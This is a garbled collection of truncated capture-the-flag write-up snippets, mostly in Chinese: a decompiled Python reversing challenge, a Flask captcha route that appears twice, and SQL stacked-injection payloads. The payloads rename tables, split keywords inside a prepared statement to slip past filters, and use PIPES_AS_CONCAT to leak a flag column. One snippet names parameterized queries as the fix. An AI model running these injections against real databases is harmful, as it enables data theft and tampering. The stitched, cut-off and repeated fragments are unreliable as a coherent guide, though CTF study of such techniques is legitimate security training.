# uncompyle6 version 3.7.4# Python bytecode 2.7 (62211)# Decompiled from: Python 3.7.8 (tags/v3.7.8:4b47a5b6ba, Jun 28 2020, 08:53:46) [MSC v.1916 64 bit (AMD64)]# Embedded file name: encode.py# Compiled at: 2019-08-19 21:01:57print'Welcome to Re World!'print'Your input1 is your flag~'l=len(input1)foriinrange(l):num=((i...
NewpasswordForm from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep from io import BytesIO from code import get_verify_code @app.route('/code') def get_code(): image, code = get_verify_code() # 图片以二进制形式写入 buf = BytesIO() image.save(buf, 'jpeg') buf_str =...
1' ; rename tables `words` to `word`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100) ; # 再用1' or 1='1拿到flag 方法二:预编译 -1';set @sql = CONCAT('se','lect*from`1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;# ...
1、堆叠注入 2、后端查询逻辑:select $_POST[query] || flag from flag。从这条语句看,根本原因是用户输入被直接拼接进SQL语句,并且数据库接口允许一次执行多条语句;改用参数化查询并关闭多语句执行即可消除这类问题。 预期解:通过堆叠注入,设置sql_mode的值为PIPES_AS_CONCAT,从而将||视为字符串的连接操作符而不是或运算符。所以payload为:1;set sql_mode=PIPES_AS_CONCAT;select 1 非预期解:select *,1 || flag from flag ...
NewpasswordForm from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep from io import BytesIO from code import get_verify_code @app.route('/code') def get_code(): image, code = get_verify_code() # 图片以二进制形式写入 buf = BytesIO() image.save(buf, 'jpeg') buf_str =...